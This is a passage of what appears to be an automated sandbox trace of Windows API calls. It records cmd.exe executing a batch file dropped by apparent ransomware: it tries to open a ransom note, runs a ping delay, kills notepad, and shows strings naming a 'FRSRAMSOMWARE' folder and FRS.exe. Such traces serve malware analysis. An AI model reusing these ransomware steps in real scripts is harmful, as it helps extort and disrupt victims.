(ExeName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.") returned 1 [0047.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.992] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.992] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", fInfoLevelId=0x1, lpFindFileData=0xc72388, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc72388) returned 0xd59bf0 [0047.992] FindClose (in: hFindFile=0xd59bf0 | out: hFindFile=0xd59bf0) returned 1 [0047.992] GetStartupInfoW (in: lpStartupInfo=0xc728e8 | out: lpStartupInfo=0xc728e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0047.992] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0x0, lpSize=0xc72878) returned 0 [0047.992] GetLastError () returned 0x7a [0047.992] InitializeProcThreadAttributeList (in: lpAttributeList=0xd76540, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0xd76540, lpSize=0xc72878) returned 1 [0047.992] UpdateProcThreadAttribute (in: lpAttributeList=0xd76540, dwFlags=0x0, Attribute=0x60001, lpValue=0xc7289c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xd76540, lpPreviousValue=0x0) returned 1 [0047.992] CreateProcessW (in: lpApplicationName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt", lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xc728a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x28, hStdError=0x2c), lpProcessInformation=0xc7288c | out: lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt ", lpProcessInformation=0xc7288c*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0047.993] DeleteProcThreadAttributeList (in: lpAttributeList=0xd76540 | out: lpAttributeList=0xd76540) [0047.993] ShellExecuteWorker () returned 0x1 [0048.309] CloseHandle (hObject=0x38c) returned 1 [0048.309] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.309] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0048.319] _get_osfhandle (_FileHandle=1) returned 0x28 [0048.319] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0048.319] _get_osfhandle (_FileHandle=0) returned 0x24 [0048.319] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0048.319] SetConsoleInputExeNameW () returned 0x1 [0048.319] GetConsoleOutputCP () returned 0x1b5 [0048.319] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0048.319] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.320] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0048.320] _open_osfhandle (_OSFileHandle=0x14c, _Flags=8) returned 3 [0048.320] _get_osfhandle (_FileHandle=3) returned 0x14c [0048.320] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0048.320] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0048.320] ReadFile (in: hFile=0x14c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x14b, lpOverlapped=0x0) returned 1 [0048.320] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0048.320] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 22 [0048.320] GetFileType (hFile=0x14c) returned 0x1 [0048.320] _get_osfhandle (_FileHandle=3) returned 0x14c [0048.320] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0048.320] _tell (_FileHandle=3) returned 2361 [0048.320] _close (_FileHandle=3) returned 0 [0048.320] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0048.320] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0048.320] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0048.320] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0048.320] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0048.320] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0048.320] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0048.320] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0048.320] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0048.320] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0048.320] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0048.320] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0048.320] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0048.320] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0048.320] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0048.320] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0048.320] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0048.320] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0048.321] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0048.321] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0048.321] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0048.321] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0048.321] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0048.321] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0048.321] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0048.321] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0048.321] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0048.321] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0048.321] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0048.321] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0048.321] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0048.321] _wcsicmp (_String1="ping", _String2="START") returned -3 [0048.321] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0048.321] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0048.321] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0048.321] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0048.321] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0048.321] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0048.321] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0048.321] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0048.321] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0048.321] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0048.321] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0048.321] SetErrorMode (uMode=0x0) returned 0x0 [0048.321] SetErrorMode (uMode=0x1) returned 0x0 [0048.321] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd65f60, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0048.321] SetErrorMode (uMode=0x0) returned 0x1 [0048.321] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.321] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.321] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.321] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0048.321] GetLastError () returned 0x2 [0048.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.321] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59b30 [0048.322] FindClose (in: hFindFile=0xd59b30 | out: hFindFile=0xd59b30) returned 1 [0048.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0048.322] GetLastError () returned 0x2 [0048.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0048.322] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0048.322] GetFileType (hFile=0x28) returned 0x2 [0048.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0048.322] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0048.322] _dup (_FileHandle=1) returned 3 [0048.322] _close (_FileHandle=1) returned 0 [0048.322] _wcsicmp (_String1="nul", _String2="con") returned 11 [0048.322] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0048.322] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0048.322] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0048.322] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0048.322] SetErrorMode (uMode=0x0) returned 0x0 [0048.322] SetErrorMode (uMode=0x1) returned 0x0 [0048.323] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd7dbf8, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0048.323] SetErrorMode (uMode=0x0) returned 0x1 [0048.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.323] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.323] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.323] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.323] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0048.323] GetLastError () returned 0x2 [0048.323] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.323] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0048.323] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0048.323] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0048.323] GetLastError () returned 0x2 [0048.323] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0048.323] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0048.323] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0048.323] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0048.323] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0048.325] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.325] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.325] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0048.325] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 10 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2f0, hThread=0x38c, dwProcessId=0x408, dwThreadId=0x4c8)) returned 1 [0048.328] CloseHandle (hObject=0x38c) returned 1 [0048.328] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.328] GetEnvironmentStringsW () returned 0xd30508* [0048.328] FreeEnvironmentStringsA (penv="=") returned 1 [0048.328] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0 [0057.644] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0057.644] CloseHandle (hObject=0x2f0) returned 1 [0057.645] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0057.645] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0057.645] GetEnvironmentStringsW () returned 0xd2c668* [0057.645] FreeEnvironmentStringsA (penv="=") returned 1 [0057.645] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0057.645] GetEnvironmentStringsW () returned 0xd30508* [0057.645] FreeEnvironmentStringsA (penv="=") returned 1 [0057.645] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0057.645] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0057.645] _close (_FileHandle=3) returned 0 [0057.645] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.645] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0057.645] _get_osfhandle (_FileHandle=1) returned 0x28 [0057.645] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0057.645] _get_osfhandle (_FileHandle=0) returned 0x24 [0057.645] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0057.646] SetConsoleInputExeNameW () returned 0x1 [0057.646] GetConsoleOutputCP () returned 0x1b5 [0057.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0057.646] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.646] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0057.646] _open_osfhandle (_OSFileHandle=0x14c, _Flags=8) returned 3 [0057.646] _get_osfhandle (_FileHandle=3) returned 0x14c [0057.646] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0057.646] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0057.646] ReadFile (in: hFile=0x14c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x135, lpOverlapped=0x0) returned 1 [0057.647] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0057.647] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="taskkill notepad.exe\r\nE_HELP_ME.txt\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 22 [0057.647] GetFileType (hFile=0x14c) returned 0x1 [0057.647] _get_osfhandle (_FileHandle=3) returned 0x14c [0057.647] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0057.647] _tell (_FileHandle=3) returned 2383 [0057.647] _close (_FileHandle=3) returned 0 [0057.647] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0057.647] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0057.647] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0057.647] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0057.647] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0057.647] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0057.647] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0057.647] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0057.647] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0057.647] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0057.647] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0057.647] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0057.647] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0057.647] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0057.647] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0057.647] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0057.647] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0057.647] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0057.647] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0057.647] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0057.647] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0057.647] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0057.648] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0057.648] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0057.648] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0057.648] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0057.648] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0057.648] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0057.648] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0057.648] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0057.648] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0057.648] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0057.648] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0057.648] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0057.648] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0057.648] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0057.648] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0057.648] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0057.648] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0057.648] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0057.648] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0057.648] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0057.648] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0057.648] SetErrorMode (uMode=0x0) returned 0x0 [0057.648] SetErrorMode 